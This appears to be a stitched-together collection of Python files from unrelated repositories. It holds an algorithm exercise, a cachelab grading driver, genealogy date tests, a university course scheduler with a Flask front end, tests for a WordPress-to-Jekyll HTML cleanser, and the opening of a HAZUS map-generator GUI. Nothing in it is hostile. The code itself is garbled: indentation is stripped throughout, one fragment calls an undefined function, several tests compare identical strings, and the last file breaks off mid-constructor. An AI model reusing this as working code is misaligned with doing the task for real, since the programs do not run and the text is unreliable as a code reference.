'''
An O(n^2) solution
'''
n = len(arr)
lis = [1]*n
for i in range (1 , n):
for j in range(0 , i):
if arr[i] > arr[j] and lis[i]< lis[j] + 1 :
lis[i] = lis[j]+1
maxLen = 0
for i in range(n):
maxLen = max(maxLen , lis[i])
return maxLen
'''
THE ALGORITHM for O(nlogn)
1. If A[i] is smallest among all end
candidates of active lists, we will start
new active list of length 1.
2. If A[i] is largest among all end candidates of
active lists, we will clone the largest active
list, and extend it by A[i].
3. If A[i] is in between, we will find a list with
largest end element that is smaller than A[i].
Clone and extend this list by A[i]. We will discard all
other lists of same length as that of this modified list.
'''
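# --- Editor's sketch (not in the original file): the three rules above reduce to
# --- keeping only the smallest tail element for each active-list length, so one
# --- binary search per element gives the O(n log n) bound.  Assumes strictly
# --- increasing subsequences, as stated in the challenge.
from bisect import bisect_left
def LIS_nlogn(arr):
    tails = []  # tails[k] = smallest possible tail of an increasing subsequence of length k+1
    for value in arr:
        pos = bisect_left(tails, value)
        if pos == len(tails):  # rule 2: largest so far, extend the longest list
            tails.append(value)
        else:                  # rules 1 and 3: replace the first tail >= value
            tails[pos] = value
    return len(tails)
# print LIS_nlogn([2, 7, 4, 3, 8])  # -> 3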
exIn = [2, 7, 4, 3, 8]
def LIS_fast(arr):
listTracker = [[arr[0]]]
for i in range(1, len(arr)):
smallest = True
largest = True
largestList = listTracker[0]
for subLst in listTracker:
if subLst[-1] < arr[i]:
smallest = False
if subLst[-1] > arr[i]:
largest = False
if len(subLst) > len(largestList):
largestList = subLst
if smallest:
listTracker.append([arr[i]])
elif largest:
largestList.append(arr[i])  # extend the longest active list (append returns None, so no assignment)
else:
maxEndElemLst = listTracker[0]
for subLst in listTracker:
if subLst[-1] < arr[i]:
if len(subLst) > len(maxEndElemLst):
maxEndElemLst = subLst
newLst = maxEndElemLst + [arr[i]]  # clone and extend (list.append would return None)
listTracker = [lst for lst in listTracker if len(lst) != len(newLst)]
listTracker.append(newLst)
maxLenLst = listTracker[0]
for lst in listTracker:
if len(lst) > len(maxLenLst):
maxLenLst = lst
return len(maxLenLst)
print LIS_fast(exIn)
inputLength = input()
inArr = []
for i in range(0, inputLength):
thisNum = input()
inArr.append(thisNum)
print LIS(inArr)
```
#### File: assignments/03-cachelab/driver.py
```python
import subprocess;
import re;
import os;
import sys;
import optparse;
#
# computeMissScore - compute the score depending on the number of
# cache misses
#
def computeMissScore(miss, lower, upper, full_score):
if miss <= lower:
return full_score
if miss >= upper:
return 0
score = (miss - lower) * 1.0
range = (upper- lower) * 1.0
return round((1 - score / range) * full_score, 1)
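# e.g. (illustrative) computeMissScore(6, 2, 10, 27) -> 13.5:
# 6 misses sit halfway between the bounds, so half of the 27 points are awarded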
#
# main - Main function
#
def main():
# Configure maxscores here
maxscore= {};
maxscore['csim'] = 27
# Parse the command line arguments
p = optparse.OptionParser()
p.add_option("-A", action="store_true", dest="autograde",
help="emit autoresult string for Autolab");
opts, args = p.parse_args()
autograde = opts.autograde
# Check the correctness of the cache simulator
print "Part A: Testing cache simulator"
print "Running ./test-csim"
p = subprocess.Popen("./test-csim",
shell=True, stdout=subprocess.PIPE)
stdout_data = p.communicate()[0]
# Emit the output from test-csim
stdout_data = re.split('\n', stdout_data)
for line in stdout_data:
if re.match("TEST_CSIM_RESULTS", line):
resultsim = re.findall(r'(\d+)', line)
else:
print "%s" % (line)
# Compute the scores for each step
csim_cscore = map(int, resultsim[0:1])
total_score = csim_cscore[0]
print "%22s%8.1f%10d" % ("Total points", total_score, maxscore['csim'])
# Emit autoresult string for Autolab if called with -A option
if autograde:
autoresult="%.1f" % (total_score)
print "\nAUTORESULT_STRING=%s" % autoresult
# execute main only if called as a script
if __name__ == "__main__":
main()
```
#### File: assignments/hw04/tests.py
```python
import unittest
from main import *
class UserStory04Tests(unittest.TestCase):
def test1(self):
#no marriage or divorce is fine
self.assertTrue(marriage_before_divorce({},{}))
def test2(self):
#marriage without divorce is fine
m = {"year":2000, "month":01, "day":01}
self.assertTrue(marriage_before_divorce(m,{}))
def test3(self):
#divorce without marriage is NOT fine
d = {"year":2000, "month":01, "day":01}
self.assertFalse(marriage_before_divorce({},d))
def test4(self):
#both events, with marriage first is fine
m = {"year":2000, "month":01, "day":01}
d = {"year":2010, "month":01, "day":01}
self.assertTrue(marriage_before_divorce(m,d))
def test5(self):
#both events, with divorce first is NOT fine
d = {"year":2000, "month":01, "day":01}
m = {"year":2010, "month":01, "day":01}
self.assertFalse(marriage_before_divorce(m,d))
class UserStory05Tests(unittest.TestCase):
def test1(self):
#no marriage or death is fine
self.assertTrue(marriage_before_death({},{}))
def test2(self):
#marriage without death is fine
m = {"year":2000, "month":01, "day":01}
self.assertTrue(marriage_before_death(m,{}))
def test3(self):
#death without marriage is fine
d = {"year":2000, "month":01, "day":01}
self.assertTrue(marriage_before_death({},d))
def test4(self):
#both events, with marriage first is fine
m = {"year":2000, "month":01, "day":01}
d = {"year":2010, "month":01, "day":01}
self.assertTrue(marriage_before_death(m,d))
def test5(self):
#both events, with death first is NOT fine
d = {"year":2000, "month":01, "day":01}
m = {"year":2010, "month":01, "day":01}
self.assertFalse(marriage_before_death(m,d))
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshgrib/sitstuff",
"score": 3
} |
#### File: src/models/scheduler.py
```python
import urllib
import os
import xml.etree.ElementTree as etree
import re
import itertools
def get_sem_list():
import requests
import re
url = 'http://web.stevens.edu/scheduler/core/'
order = {'W':0, 'S':1, 'A':2, 'B':3, 'F':4}#custom alphabetic order
r = requests.get(url)
myre = re.compile(r'[0-9]{4}[A-Z]')#get things like '####A'
re_list = myre.findall(r.text)
sem_list = sorted(
list(set(re_list)), #gets only unique values
#sort by year then term in custom alphabetic order
key=lambda semester: (semester[:4], order.get(semester[-1])),
reverse=True)#most recent first
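# e.g. (illustrative) ['2017F', '2017S', '2016F', ...] -- newest year first,
# and Fall before Spring within the same year per the custom term order above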
return sem_list
SEMESTER = get_sem_list()[0]
def cleanupCourses(this_root, this_course_list): # called from schedule()
"""Given the root of the xml tree and the course list, this will go through the XML and remove any course not in the list from the tree, then returns the revised root"""
for course in this_root.findall('Course'):
name = course.get('Section')
while re.match("([A-Za-z-])", name[-1]) or re.match("([A-Za-z-])", name[-2]):
name = name[:(len(name) - 1)]
if name not in this_course_list:
this_root.remove(course)
return this_root
def cleanupElements(this_root): # called from schedule()
"""Given the root of the xml tree, this goes through the courses and removes any elements that don't have info about meeting times, then returns the revised root"""
for course in this_root.findall('Course'):
for element in course:
if element.tag == 'Meeting':
pass
else:
course.remove(element)
return this_root
def fixSpacing(this_root): # called from schedule()
"""Given the root of the xml tree, this will go through and fix the spacing between the letters and numbers so it can be compared better later on, then returns the revised root"""
for course in this_root:
attribs = course.attrib
section = attribs['Section']
index_count = 0
new_section = ""
for letter in section:
if letter == " ":
letter = (4 - index_count) * " "
new_section = new_section + letter
index_count += 1
attribs['Section'] = new_section
return this_root
def fixTime(time): # called from schedule()
"""Given a time from the "StartTime" or "EndTime" attribute in the xml tree, this will change teh format to HHMM and return the revised time. This also corrects a 4 hour offset present in the time formats"""
time = time[:(len(time) - 4)]
if len(time) == 4: # add a 0 to the front of early times
time = '0' + time
time = time[:2] + time[3:] # remove the colon
hours = int(time[:2]) + 4 # correct 4 hour offset
hours = str(hours)
if len(hours) == 1:
# add the 0 in front of early times if it needs it now
hours = "0" + hours
time = hours + time[2:]
return time
def fixTimeFormat(this_root): # called from schedule()
"""Given the root of the xml tree, this will go through and fix the time formatting, making it standard 24hr as 4 digits in the form of HHMM, then returns the revised root"""
for course in this_root:
for meeting in course:
attribs = meeting.attrib
try:
start_time = attribs['StartTime'] # get values
end_time = attribs['EndTime']
start_time = fixTime(start_time) # fix values
end_time = fixTime(end_time)
attribs['StartTime'] = start_time # reassign
attribs['EndTime'] = end_time
except KeyError:
# somehow something that wasn't a meeting slipped through
course.remove(meeting)
return this_root
def getCallNums(this_root): # called from schedule()
"""Given the root of the xml tree, this will parse the xml and return a dictionary of course sections and call numbers"""
call_numbers = {}
for course in this_root:
section_name = course.attrib['Section']
call_num = int(course.attrib['CallNumber'])
call_numbers[section_name] = call_num
return call_numbers
def getBigDict(this_root): # called from schedule()
"""Given the root of the xml tree, this will parse the xml and return a nested dictionary of courses, sections, and meeting times"""
big_dict = {}
prev_course = ""
for course in this_root: # add classes and section lists
attribs = course.attrib
this_course = attribs['Section']
if len(this_course) == 9: # recitation course
course_big = this_course[:8]
course_section = this_course[8:]
if course_big == prev_course[:8]: # same course
# add the new section with a list
big_dict[course_big][course_section] = []
else: # new course
big_dict[course_big] = {} # add the new class
# add the new section with a list
big_dict[course_big][course_section] = []
else: # normal course(lecture)
course_big = this_course[:7]
course_section = this_course[7:]
if this_course[:7] == prev_course[:7]: # same course
# add the new section with a list
big_dict[course_big][course_section] = []
else: # new course
big_dict[course_big] = {} # add the new class
# add the new section with a list
big_dict[course_big][course_section] = []
prev_course = this_course
for meeting in course: # write the meetings to the section lists
info = meeting.attrib
try:
day = info['Day']
startTime = info['StartTime']
endTime = info['EndTime']
# if the exact same meeting is already in the list
if [day, startTime, endTime] in big_dict[course_big][course_section]:
break # then dont add another!
if len(day) == 1: # if this meeting describes one day
big_dict[course_big][course_section].append(
[day, startTime, endTime]) # add the meeting time
else: # if multiple days happen at the same time
for letter in day: # add one list for each meeting
big_dict[course_big][course_section].append(
[letter, startTime, endTime])
except KeyError:
pass
#TOGGLE below for list of courses that cause errors
#global global_class_error_list
#global_class_error_list.append(str(course.get('Section')))
return big_dict
def isAllowed(classList1, classList2): # called from checkCombination()
'''Given two meeting lists, check to see if there is a conflict, and return True if there is not'''
# if class 2 ends before class 1 starts, or class 1 ends before class 2
# starts, then it's fine
if (classList2[2] < classList1[1]) or (classList1[2] < classList2[1]):
return True
else:
return False
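# e.g. (illustrative) isAllowed(['M', '0900', '0950'], ['M', '1000', '1050']) -> True (no overlap)
#      isAllowed(['M', '0900', '0950'], ['M', '0930', '1030']) -> False (times overlap)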
def checkCombination(courseDict, inputList): # called from findAllCombos()
'''This will go through a combination list and see if it all works. If it does it will return a true value'''
conflicts = 0 # initialize counters
# find all combinations of size 2 from the inputList
for thisCombo in itertools.combinations(inputList, 2):
# comparison one is the item in the list we are on now
comp1 = thisCombo[0]
# separate the section and the course, different if it's a lecture
if len(comp1) == 9:
course1 = comp1[0:8]
section1 = comp1[8:]
else:
course1 = comp1[0:7]
section1 = comp1[7:]
comp2 = thisCombo[1] # comparison two is the next item in the list
# separate the section and the course, different if it's a lecture
if len(comp2) == 9:
course2 = comp2[0:8]
section2 = comp2[8:]
else:
course2 = comp2[0:7]
section2 = comp2[7:]
# check one is the list of meetings for course1 section1
check1 = courseDict[course1][section1]
# check two is the list of meetings for course2 section2
check2 = courseDict[course2][section2]
for meeting1 in check1:
for meeting2 in check2:
# if the meetings are on the same day...
if meeting1[0] == meeting2[0]:
# if there is no conflicts do nothing
if (isAllowed(meeting1, meeting2) == True):
pass
# if there is a conflict, add to the conflict counter
else:
conflicts = conflicts + 1
if conflicts == 0: # if there were no conflicts, return true
return True
#return False #maybe this should be here?
def findAllCombos(courseDict, callNumbers): # called from schedule()
'''This function goes through the nested courses, builds all possible combinations of one section per course, and returns the conflict-free combinations with their scheduler URLs'''
bigList = [] # list of lists of courses and sections
goodCombos = [] # store all the good combinations
badCombos = [] # store the bad combinations
possibilities = ""
# make a list of lists with the small lists being lists of possible
# sections for one course
for course in courseDict:
courseList = []
for section in courseDict[course]:
courseList.append(str(course + section))
bigList.append(courseList)
combos = 0 # initialize the counter
# find all combinations of one section of each class
allCombos = list(itertools.product(*bigList))
for combo in allCombos:
combos = combos + 1
# see if the combo works and add to appropriate list
if checkCombination(courseDict, combo) == True:
goodCombos.append(combo)
else:
badCombos.append(combo)
possibilities = {}
# possibilities['totalCombos']=str(combos)
# possibilities['goodCombos']=str(goodCombos)
comboCounter = 1
for x in goodCombos:
urlPart = []
possibilities[comboCounter] = {}
for course in x:
urlPart.append(callNumbers[str(course)])
# format url
url = 'https://web.stevens.edu/scheduler/#' + SEMESTER + '='
for callNumber in urlPart:
url = url + str(callNumber) + ","
url = url[:-1]
possibilities[comboCounter]['url'] = str(url)
possibilities[comboCounter]['list'] = str(x)
comboCounter = comboCounter + 1
return possibilities
def schedule(course_list):
"""
Given a list of courses, return a dictionary of the possible schedules
['BT 353','CS 135','HHS 468','BT 181','CS 146','CS 284'] -->
{1:
{'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12011,11995,10482,10487',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353C', 'HHS 468EV', 'CS 146B', 'CS 284RA')"},
2: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12011,11995,10482,12166',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353C', 'HHS 468EV', 'CS 146B', 'CS 284RB')"},
3: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12012,11995,10482,10487',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353D', 'HHS 468EV', 'CS 146B', 'CS 284RA')"},
4: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12012,11995,10482,12166',
'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353D', 'HHS 468EV', 'CS 146B', 'CS 284RB')"}}
"""
print course_list
url = 'https://web.stevens.edu/scheduler/core/' + SEMESTER + '/' + SEMESTER + '.xml'
urllib.urlretrieve(url, 'courses.xml')
tree = etree.parse('courses.xml')
os.remove('courses.xml')
root = tree.getroot()
root = cleanupCourses(root, course_list)
root = cleanupElements(root)
root = fixSpacing(root)
root = fixTimeFormat(root)
call_numbers = getCallNums(root)
big_dict = getBigDict(root)
all_combos = findAllCombos(big_dict, call_numbers)
return all_combos
if __name__ == '__main__':
print schedule(['CS 442', 'CS 392', 'CS 519', 'MA 331'])
```
#### File: sitstuff/src/views.py
```python
from flask import Flask, render_template, request, make_response, redirect, session, jsonify
from src import app
#######################
# Static pages #
# and errors #
#######################
@app.route('/')
@app.route('/index')
def index():
"""
Returns the home page
"""
resp = make_response(render_template("index.html", title='Home'))
return resp
@app.route('/donate')
def donate():
return render_template("donate.html", title='Donate')
@app.errorhandler(500)
def internal_error(error):
return render_template('505.html'), 505
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
@app.errorhandler(403)
def forbidden_error(error):
return render_template('403.html'), 403
#######################
# Course info #
#######################
from models import dbtools
@app.route('/courses')
def courses():
db = dbtools.CourseDB('src/models/course_info.db', 'courses')
courses = db.get_HTML()
depts = db.get_depts()
db.close_db()
resp = render_template('courses.html',
title='Courses',
courses=courses,
letter_links=depts)
return resp
#######################
# Scheduling #
#######################
from models import scheduler
import json
PER_PAGE = 10
AMOUNT_OF_COURSES = 10
@app.route('/sched_entry')
def how_many_post():
"""
Goes to form with AMOUNT_OF_COURSES text boxes to input
courses to schedule, form action=/schedules, method=POST
"""
default_courses = ['CS 442', 'CS 392', 'CS 519', 'MA 331']
resp = make_response(render_template(
"sched_entry.html",
quantity=AMOUNT_OF_COURSES,
title='Scheduler',
default_vals=default_courses))
resp.set_cookie('course_combos', '', expires=0)
return resp
@app.route('/schedules', methods=['GET','POST'])
def my_form_post():
"""
Gets input from form, puts it in a list, gets the schedules,
send JSON of course combinations and send then to /sched as
a cookie
"""
text_list = []
#make list of form inputs
for i in range(1, AMOUNT_OF_COURSES + 1):
form_num = 'text' + str(i)
text_list.append(request.form[form_num])
#remove items with no input, generate string of courses
final_list = []
for text in text_list:
if not text == "":
final_list.append(text)
courses_str = ""
for course in final_list[:-1]:
courses_str += (str(course) + ',')
courses_str += str(final_list[-1])
courses_str = courses_str.upper()
#turn string of courses entered into list
c_list = courses_str.split(',')
#get the schedules
#print "\nCourse list:"
#print str(c_list) + "\n"
my_combos = scheduler.schedule(c_list)
resp = make_response(redirect('/sched'))
resp.set_cookie('course_combos', '', expires=0)
resp.set_cookie('course_combos', json.dumps(my_combos))
return resp
@app.route('/get_combos', methods=['GET'])
def getCombosAPI():
"""
Upon a GET request containing csv course names in a query string...
Find the combos and send them as JSON
"""
all_args = request.args.lists()
course_list = all_args[0][1][0].split(",")
u_COURSE_LIST = map((lambda x: x.upper()), course_list)#make all caps just in case
COURSE_LIST = map( str, u_COURSE_LIST)#unicode list -> list of python strs
combos = scheduler.schedule(COURSE_LIST)
return jsonify(combos)
def getCombosForPage(page_num, per_page, count_of_combos, combos):
"""Returns the set of combos for the current page"""
combos_start = (per_page * (page_num - 1)) + 1
combos_end = combos_start + per_page
these_combos = {}
for key in range(combos_start, combos_end):
try:
# if new dict is not an int schedules are not sorted on the page
these_combos[key] = combos[str(key)]
except KeyError:
pass
return these_combos
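# e.g. (illustrative) per_page=10, page_num=2 -> keeps combos["11"] .. combos["20"]
# (combos is keyed by stringified integers after the JSON round-trip through the cookie)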
def isLastPage(page_num, count_of_combos, per_page):
"""Return True if this is the last page in the pagination"""
if count_of_combos <= (page_num * per_page):
return True
return False
@app.route('/sched/', defaults={'page': 1})
@app.route('/sched/page/<int:page>')
def scheduleMe(page):
"""
Display schedules as links and iframes
"""
querystring_combos = request.cookies.get('course_combos')
if not querystring_combos:
return render_template('404.html'), 404
combos = json.loads(querystring_combos)
#print querystring_combos
count = len(combos)
pagination_needed = count > PER_PAGE
this_page_combos = combos
if pagination_needed:
this_page_combos = getCombosForPage(page, PER_PAGE, count, combos)
last_page = isLastPage(page, count, PER_PAGE)
if not this_page_combos and page != 1:
return render_template('404.html'), 404
return render_template("sched.html",
title="Scheduler",
combos=this_page_combos,
combo_amount=str(count),
page=page,
last_page=last_page,
pagination=pagination_needed)
########################
# Random stuff #
########################
``` |
{
"source": "joshgroeneveld/gis.utah.gov",
"score": 3
} |
#### File: gis.utah.gov/scripts/tests.py
```python
import unittest
from os.path import dirname, join
import cleanser
import UpdateYaml
import yaml
#: run with python -m unittest discover scripts
class TestCleanser(unittest.TestCase):
def test_update_image_url(self):
test = '<p>[image title="Students watch a portion of "The Geospatial Revolution" to learn about GIS." size="medium" align="left" icon="zoom" lightbox="true" quality="100"]/gallery/agrc-general/gis_day_slcc_2011.jpg[/image]For'
valid = '<p><img src="{{ "/images/gallery/agrc-general/gis_day_slcc_2011.jpg" | prepend: site.baseurl }}" class="inline-text-left" />For'
self.assertEqual(cleanser.update_image_tag(test), valid)
def test_update_gallery_links(self):
# self.fail('write a test')
pass
def test_update_css_links(self):
# self.fail('write a test')
pass
def test_update_page_links(self):
# self.fail('write a test')
pass
def test_update_download_asset_links(self):
# self.fail('write a test')
pass
def test_update_data_page_buttons(self):
test = '<a href="ftp://ftp.agrc.utah.gov" class="button medium white"><span class="button-text">Download Locators</span></a>'
valid = '<a href="ftp://ftp.agrc.utah.gov" class="button medium white"><span class="button-text">Download Locators</span></a>'
self.assertEqual(cleanser.update_data_download_button(test), valid)
def test_captions(self):
test = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/><figcaption class="caption__text">Concept of an Address Locator</figcaption></div>'
valid = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/><figcaption class="caption__text">Concept of an Address Locator</figcaption></div>'
self.assertEqual(cleanser.update_caption(test), valid)
test = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/></div>'
valid = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/></div>'
self.assertEqual(cleanser.update_caption(test), valid)
test = '<p>[caption id="attachment_18156" align="alignright" width="300" caption="The pendulum swings back and forth..."]<a href="{{ "/downloads/Screen-Shot-2015-11-27-at-12.39.23-PM.png" | prepend: site.baseurl }}"><img src="{{ "/images/Screen-Shot-2015-11-27-at-12.39.23-PM-300x220.png" | prepend: site.baseurl }}" alt="" title="The pendulum swings back and forth..." width="300" height="220" /></a>[/caption]</p>'
valid = '<div class="caption caption--right"><a href="{{ "/downloads/Screen-Shot-2015-11-27-at-12.39.23-PM.png" | prepend: site.baseurl }}"><img src="{{ "/images/Screen-Shot-2015-11-27-at-12.39.23-PM-300x220.png" | prepend: site.baseurl }}" alt="" title="The pendulum swings back and forth..." width="300" height="220" /></a><figcaption class="caption__text">The pendulum swings back and forth...</figcaption></div>'
self.assertEqual(cleanser.update_caption(test), valid)
def test_half_columns(self):
test = '''<div class="grid"><div class="grid__col grid__col--1-of-2">
<h3>Overview</h3>
</div>
<div class="grid__col grid__col--1-of-2">
<h3>SGID Datasets</h3>
</div></div>'''
valid = '''<div class="grid"><div class="grid__col grid__col--1-of-2">
<h3>Overview</h3>
</div>
<div class="grid__col grid__col--1-of-2">
<h3>SGID Datasets</h3>
</div></div>'''
self.assertEqual(cleanser.update_columns(test), valid)
def test_divider(self):
test = '<div class="divider"></div>'
valid = '<div class="divider"></div>'
self.assertEqual(cleanser.update_divider(test), valid)
test = '<div class="divider-padding"></div>'
valid = '<div class="divider-padding"></div>'
self.assertEqual(cleanser.update_divider(test), valid)
test = '<div class="divider-padding"></div>'
self.assertEqual(cleanser.update_divider(test), valid)
def test_icons(self):
test = '<span class="icon-text icon-download"><a title="Download available HRO imagery" href="https://raster.utah.gov/?catGroup=HRO%202012%20(12.5cm),HRO%202012%20(1ft),HRO%202009%20(25cm),HRO%202006%20(25cm),HRO%202003%20(30cm)&title=Utah%20HRO%20Imagery">HRO Orthophotography Interactive Map</a></span><br />'
valid = '<span class="icon-text icon-download"><a title="Download available HRO imagery" href="https://raster.utah.gov/?catGroup=HRO%202012%20(12.5cm),HRO%202012%20(1ft),HRO%202009%20(25cm),HRO%202006%20(25cm),HRO%202003%20(30cm)&title=Utah%20HRO%20Imagery">HRO Orthophotography Interactive Map</a></span><br />'
self.assertEqual(cleanser.update_icons(test), valid)
test = '<p><span class="icon-text icon-calendar">Last Update: March, 2013</span><br />'
valid = '<p><span class="icon-text icon-calendar">Last Update: March, 2013</span><br />'
self.assertEqual(cleanser.update_icons(test), valid)
def test_tables(self):
test = ' '
valid = ' '
self.assertEqual(cleanser.update_tables(test), valid)
test = '<div class="table-style">'
valid = '<div class="table-style">'
self.assertEqual(cleanser.update_tables(test), valid)
test = '<div class="table-style">'
self.assertEqual(cleanser.update_tables(test), valid)
test = '<div class="table-style">'
self.assertEqual(cleanser.update_tables(test), valid)
test = '</div>'
valid = '</div>'
self.assertEqual(cleanser.update_tables(test), valid)
def maybelater_tabs(self):
test = '<p><br />'
valid = '<p><br />'
self.assertEqual(cleanser.update_tabs(test), valid, msg='1')
test = '<p><br />'
self.assertEqual(cleanser.update_tabs(test), valid, msg='2')
test = '<p></p>'
valid = '<p></p>'
self.assertEqual(cleanser.update_tabs(test), valid, msg='3')
test = '<p><br />'
valid = '<p><br />'
self.assertEqual(cleanser.update_tabs(test), valid, msg='4')
test = '<p> </p>'
valid = '<p> </p>'
self.assertEqual(cleanser.update_tabs(test), valid)
test = '<p></p>'
valid = '<p></p>'
self.assertEqual(cleanser.update_tabs(test), valid, msg='6')
test = 'This dataset was last updated in 2002.</p>'
valid = 'This dataset was last updated in 2002.</p>'
self.assertEqual(cleanser.update_tabs(test), valid)
test = '<h5 class="tab-title">Contact</h5><br />'
valid = '<h5 class="tab-title">Contact</h5>'
self.assertEqual(cleanser.update_tabs(test), valid)
test = '<h5 class="tab-title">Contact</h5><br />'
self.assertEqual(cleanser.update_tabs(test), valid)
def create_data_package_page(self):
from os.path import join, dirname
file_path = join(dirname(__file__), 'data', 'index.html')
with open(file_path, 'r') as test_file, open(file_path.replace('index.html', 'testoutput.html'), 'wb') as updated:
file_content = []
for line_content in test_file.readlines():
file_content.append(line_content)
replaced = cleanser.update_tabs(file_content)
updated.writelines(replaced)
class TestYaml(unittest.TestCase):
def test_yaml_key_removal(self):
front_matter = yaml.load('''
layout: page
status: publish
published: true
title: Undreground Storage Tanks
author:
display_name: <NAME>
login: <NAME>
email: <EMAIL>
url: ''
author_login: <NAME>
author_email: <EMAIL>
wordpress_id: 1895
wordpress_url: http://gis.utah.gov/?page_id=1895
date: '2011-08-31 23:58:01 -0600'
date_gmt: '2011-09-01 05:58:01 -0600'
categories: []
tags:
- sgid
- Data
- utah
- gis
- map
- mapping
- dataset
- download
- agrc
- layer
- shapefile
- geodatabase
- metadata
- shp
- gdb
- kml
- lyr
- digital
- geographic
- information
- database
- state
- statewide''')
valid = set(['status', 'published', 'layout', 'title', 'author', 'date', 'categories', 'tags'])
valid_sub_keys = set(['display_name', 'email'])
front_matter = UpdateYaml.prune_keys(front_matter)
self.assertSetEqual(set(front_matter.keys()), valid)
self.assertSetEqual(set(front_matter['author'].keys()), valid_sub_keys)
def test_yaml_tag_removal(self):
front_matter = yaml.load('''
layout: page
status: publish
published: true
title: Undreground Storage Tanks
author:
display_name: <NAME>
login: <NAME>
email: <EMAIL>
url: ''
author_login: <NAME>
author_email: <EMAIL>
wordpress_id: 1895
wordpress_url: http://gis.utah.gov/?page_id=1895
date: '2011-08-31 23:58:01 -0600'
date_gmt: '2011-09-01 05:58:01 -0600'
categories: []
tags:
- sgid
- Data
- utah
- gis
- map
- mapping
- Geocoding
- geocoding
- agrc
- layer
- shapefile
- geodatabase
- metadata
- shp
- gdb
- kml
- lyr
- digital
- geographic
- deq
- information
- database
- state
- statewide''')
valid = ['data', 'geocoding', 'deq']
valid.sort()
tags = UpdateYaml.prune_tags(front_matter)
self.assertListEqual(tags, valid)
def test_pluck_yaml(self):
f = join(dirname(__file__), 'data', 'yaml.html')
with open(f, 'r') as html:
front_matter = UpdateYaml.pluck_yaml(html)
self.assertIsNotNone(front_matter)
def test_pluck_content(self):
f = join(dirname(__file__), 'data', 'yaml.html')
with open(f, 'r') as html:
content = ''.join(UpdateYaml.pluck_content(html))
self.assertEqual(content, '''<h1>This is the content of the file</h1>
<p>pretty cool</p>
<p>ok bye</p>
''')
``` |
{
"source": "joshgroeneveld/hazus-map-generator",
"score": 3
} |
#### File: joshgroeneveld/hazus-map-generator/HAZUS_Map_Automation.py
```python
import sys
import traceback
import wx
import os
import logging
import shutil
import sqlinstances
import pyodbc
import inspect
from arcpy import mapping
from arcpy import management
from arcpy import da
# 1. Initialize wxpython window
class MainFrame(wx.Frame):
logfile = None
def __init__(self, parent):
wx.Frame.__init__(self, parent, size=wx.Size(-1, -1))
if self.logfile is None:
self.logfile = 'C:\\Temp\\HAZUS_Map_Generator_Log.txt'
self.__initlogging()
self.main_panel = wx.Panel(self, wx.ID_ANY)
self.SetTitle("HAZUS Map Generator version 0.1.0")
self.sb = self.CreateStatusBar()
self.sb.SetStatusText("Please select a folder to store your maps.")
self.logger.info("Script initiated")
label_font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
label_font.MakeBold()
label_font.SetPointSize(14)
normal_font = wx.Font(10, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
box = wx.BoxSizer(wx.VERTICAL)
# the welcome box
welcome_staticbox = wx.StaticBox(self.main_panel, -1, "Welcome!", size=(-1, -1))
welcome_staticbox.SetOwnFont(label_font)
welcome_sizer = wx.StaticBoxSizer(welcome_staticbox)
# welcome text
welcomemessage = """The HAZUS Map Generator creates a series of maps of your choice based on a HAZUS analysis.
This tool assumes that you already have a HAZUS study region and that HAZUS has already finished analyzing the hazards in your study region.
Select your HAZUS Server and the study region from the list below to get started."""
welcome_text = wx.StaticText(self.main_panel, -1, welcomemessage)
welcome_text.SetFont(normal_font)
welcome_sizer.Add(welcome_text)
# the output folder picker box
output_directory_staticbox = wx.StaticBox(self.main_panel, -1, "Select a folder to store the maps", size=(-1, -1))
output_directory_staticbox.SetOwnFont(label_font)
output_directory_sizer = wx.StaticBoxSizer(output_directory_staticbox)
# Set up the menu to choose a directory from the system
self.output_directory_dialog_button = wx.Button(output_directory_staticbox, label="Browse...", size=wx.Size(-1, -1))
self.output_directory_dialog_button.SetFont(normal_font)
output_directory_sizer.Add(self.output_directory_dialog_button)
self.output_directory = ""
self.scenario_dir = ""
self.scenario_data_dir = ""
self.study_region_data = ""
self.output_directory_dialog_button.Bind(wx.EVT_BUTTON, self.select_output_directory)
# the server and database info box
self.serverinfo_staticbox = wx.StaticBox(self.main_panel, -1, "Server Information and Database Information", size=(-1, -1))
self.serverinfo_staticbox.SetOwnFont(label_font)
server_and_db_sizer = wx.StaticBoxSizer(self.serverinfo_staticbox, orient=wx.VERTICAL)
# Create a drop down menu to select the name of the HAZUS Server
server_box = wx.BoxSizer(wx.HORIZONTAL)
server_and_db_sizer.Add(server_box)
self.hazus_server_label = wx.StaticText(server_and_db_sizer.GetStaticBox(), -1, "Select your HAZUS Server")
self.hazus_server_label.SetFont(normal_font)
server_box.Add(self.hazus_server_label)
server_box.Add(wx.Size(20, 10))
self.hazus_server_choices = ["Server 1", "Server 2"]
self.hazus_server_list = wx.ComboBox(self.serverinfo_staticbox, -1, "", choices=self.hazus_server_choices, size=wx.Size(300, -1))
self.hazus_server_list.SetFont(normal_font)
server_box.Add(self.hazus_server_list)
self.hazus_server = ""
self.hazus_server_list.Bind(wx.EVT_COMBOBOX, self.select_hazus_server)
# the database info sizer -- nests under the server and database info box
database_box = wx.BoxSizer(wx.HORIZONTAL)
server_and_db_sizer.Add(database_box)
# Create a drop down menu to select the HAZUS Study Region
